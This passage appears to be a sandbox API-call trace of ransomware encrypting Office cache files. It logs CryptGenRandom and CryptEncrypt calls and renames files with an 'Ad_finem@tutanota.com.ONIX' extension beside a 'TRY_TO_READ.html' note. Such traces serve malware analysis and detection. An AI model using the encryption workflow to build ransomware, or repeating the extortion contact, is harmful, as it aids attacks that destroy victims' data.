UnlockFile (hFile=0x50c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd7200, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0124.723] CloseHandle (hObject=0x50c) returned 1 [0124.724] GetProcessHeap () returned 0x410000 [0124.724] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0124.724] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0124.726] GetProcessHeap () returned 0x410000 [0124.726] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a198 | out: hHeap=0x410000) returned 1 [0124.726] FindNextFileW (in: hFindFile=0x4e0cc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0124.726] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x50c [0124.727] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0124.727] LockFile (hFile=0x50c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5b1, nNumberOfBytesToLockHigh=0x0) returned 1 [0124.727] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0124.727] ReadFile (in: hFile=0x50c, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0124.730] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.730] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.731] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0124.731] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0124.731] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", dwFileAttributes=0x80) returned 1 [0124.731] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 82 [0124.731] GetProcessHeap () returned 0x410000 [0124.731] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x114) returned 0x46a198 [0124.731] lstrcpyW (in: lpString1=0x46a198, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" [0124.731] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0124.731] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1457) returned 1 [0124.731] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x5b1 [0124.731] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0124.731] GetProcessHeap () returned 0x410000 [0124.731] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0124.731] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0124.731] WriteFile (in: hFile=0x50c, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0124.733] WriteFile (in: hFile=0x50c, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0124.735] WriteFile (in: hFile=0x50c, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0124.736] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5b1) returned 0x4e1b68 [0124.736] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5b1) returned 0x4e2128 [0124.736] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.736] ReadFile (in: hFile=0x50c, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x5b1, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x5b1, lpOverlapped=0x0) returned 1 [0124.736] SetFilePointer (in: hFile=0x50c, lDistanceToMove=-1457, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.736] WriteFile (in: hFile=0x50c, lpBuffer=0x4e2128*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e2128*, lpNumberOfBytesWritten=0x367f44c*=0x5b1, lpOverlapped=0x0) returned 1 [0124.739] UnlockFile (hFile=0x50c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5b1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0124.739] CloseHandle (hObject=0x50c) returned 1 [0124.739] GetProcessHeap () returned 0x410000 [0124.739] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0124.739] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0124.742] GetProcessHeap () returned 0x410000 [0124.742] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a198 | out: hHeap=0x410000) returned 1 [0124.742] FindNextFileW (in: hFindFile=0x4e0cc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x427f81b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x427f81b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x427f81b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0124.742] FindNextFileW (in: hFindFile=0x4e0cc0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x427f81b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x427f81b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x427f81b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0124.742] CloseHandle (hObject=0x3cc) returned 1 [0124.742] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0124.742] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x4, wMilliseconds=0x7f)) [0124.742] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0124.743] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0124.743] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0124.743] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr9c354ca09c354b444c.lock") returned 95 [0124.743] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0124.743] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.743] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.744] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa0) returned 0x4decd0 [0124.744] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x427f81b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x427f81b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4e0d00 [0124.744] FindNextFileW (in: hFindFile=0x4e0d00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x427f81b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x427f81b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0124.744] FindNextFileW (in: hFindFile=0x4e0d00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0124.744] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x510 [0124.744] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0124.744] LockFile (hFile=0x510, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1416b54, nNumberOfBytesToLockHigh=0x0) returned 1 [0124.744] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0124.745] ReadFile (in: hFile=0x510, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0124.747] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.747] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.747] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0124.747] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0124.747] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", dwFileAttributes=0x80) returned 1 [0124.748] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 82 [0124.748] GetProcessHeap () returned 0x410000 [0124.748] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x114) returned 0x46a198 [0124.748] lstrcpyW (in: lpString1=0x46a198, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" [0124.748] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0124.748] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=21064532) returned 1 [0124.748] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1416b54 [0124.748] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0124.748] GetProcessHeap () returned 0x410000 [0124.748] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0124.748] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0124.748] WriteFile (in: hFile=0x510, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0124.750] WriteFile (in: hFile=0x510, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0124.751] WriteFile (in: hFile=0x510, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0124.753] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1416b54) returned 0x3680020 [0124.754] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1416b54) returned 0x4aa0020 [0124.754] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.754] ReadFile (in: hFile=0x510, lpBuffer=0x3680020, nNumberOfBytesToRead=0x1416b54, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x1416b54, lpOverlapped=0x0) returned 1 [0126.423] UnlockFile (hFile=0x510, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1416b54, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0126.423] CloseHandle (hObject=0x510) returned 1 [0126.424] GetProcessHeap () returned 0x410000 [0126.424] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0126.424] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0126.428] GetProcessHeap () returned 0x410000 [0126.428] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a198 | out: hHeap=0x410000) returned 1 [0126.428] FindNextFileW (in: hFindFile=0x4e0d00, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2e3b660, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd8400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0126.428] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x510 [0126.428] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0126.428] LockFile (hFile=0x510, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd8400, nNumberOfBytesToLockHigh=0x0) returned 1 [0126.428] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.428] ReadFile (in: hFile=0x510, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0126.430] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.430] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.430] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0126.430] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0126.430] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi", dwFileAttributes=0x80) returned 1 [0126.430] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 82 [0126.430] GetProcessHeap () returned 0x410000 [0126.430] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x114) returned 0x46a198 [0126.430] lstrcpyW (in: lpString1=0x46a198, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" [0126.430] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0126.430] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=885760) returned 1 [0126.431] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xd8400 [0126.431] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0126.431] GetProcessHeap () returned 0x410000 [0126.431] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0126.431] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0126.431] WriteFile (in: hFile=0x510, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0126.433] WriteFile (in: hFile=0x510, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0126.434] WriteFile (in: hFile=0x510, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0126.435] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8400) returned 0x2680020 [0126.435] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8400) returned 0x2b30020 [0126.435] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.435] ReadFile (in: hFile=0x510, lpBuffer=0x2680020, nNumberOfBytesToRead=0xd8400, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2680020*, lpNumberOfBytesRead=0x367f44c*=0xd8400, lpOverlapped=0x0) returned 1 [0126.483] UnlockFile (hFile=0x510, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd8400, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0126.483] CloseHandle (hObject=0x510) returned 1 [0126.483] GetProcessHeap () returned 0x410000 [0126.483] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0126.483] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All 